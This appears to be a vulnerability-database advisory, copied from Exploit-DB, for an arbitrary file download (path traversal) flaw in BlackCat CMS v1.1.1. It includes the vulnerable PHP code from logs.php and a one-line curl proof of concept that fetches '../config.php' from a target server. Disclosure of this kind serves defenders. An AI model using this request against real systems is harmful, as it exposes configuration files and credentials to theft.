BlackCat CMS v1.1.1 Arbitrary File Download Vulnerability

vendor:

BlackCat CMS

by:

N/A

7.5

CVSS

HIGH

Arbitrary File Download

434

CWE

Product Name: BlackCat CMS

Affected Version From: v1.1.1

Affected Version To: v1.1.1

Patch Exists: NO

Related CWE: N/A

CPE: a:blackcat-cms:blackcat_cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Centos 6.5, PHP 5.4.41

2015

BlackCat CMS v1.1.1 Arbitrary File Download Vulnerability

BlackCat CMS v1.1.1 is vulnerable to an arbitrary file download vulnerability due to insufficient sanitization of user input. An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable server, which will allow the attacker to download any file from the server.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in file operations.

Source

Exploit-DB raw data:

# Exploit Title: BlackCat CMS v1.1.1 Arbitrary File Download Vulnerability 
# Date: 2015/06/16
# Vendor Homepage: http://blackcat-cms.org/
# Software Link: http://blackcat-cms.org/temp/packetyzer/blackcatcms_2fo3PXdKj1.zip
# Version: v1.1.1
# Tested on: Centos 6.5,PHP 5.4.41
# Category: webapps

* Description

file:/modules/blackcat/widgets/logs.php

 72 // download
 73 if(CAT_Helper_Validate::sanitizeGet('dl'))
 74 {
 75     $file = CAT_Helper_Directory::sanitizePath(CAT_PATH.'/temp/'.CAT_Helper_Validate::sanitizeGet('dl'));  <-- Not Taint Checking
 76     if(file_exists($file))
 77     {
 78         $zip = CAT_Helper_Zip::getInstance(pathinfo($file,PATHINFO_DIRNAME).'/'.pathinfo($file,PATHINFO_FILENAME).'.zip');
 79         $zip->config('removePath',pathinfo($file,PATHINFO_DIRNAME))
 80             ->create(array($file));
 81         if(!$zip->errorCode() == 0)
 82         {
 83             echo CAT_Helper_Validate::getInstance()->lang()->translate("Unable to pack the file")
 84                 . ": ".str_ireplace( array( str_replace('\\','/',CAT_PATH),'\\'), array('/abs/path/to','/'), $file );
 85         }
 86         else
 87         {
 88             $filename = pathinfo($file,PATHINFO_DIRNAME).'/'.pathinfo($file,PATHINFO_FILENAME).'.zip';
 89             header("Pragma: public"); // required
 90             header("Expires: 0");
 91             header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
 92             header("Cache-Control: private",false); // required for certain browsers
 93             header("Content-Type: application/zip");
 94             header("Content-Disposition: attachment; filename=\"".basename($filename)."\";" );
 95             header("Content-Transfer-Encoding: binary");
 96             header("Content-Length: ".filesize($filename));
 97             readfile("$filename");
 98             exit;
 99         }
100     }


POC:
curl -sH 'Accept-encoding: gzip' "http://10.1.1.1/blackcat/modules/blackcat/widgets/logs.php?dl=../config.php" |gunzip -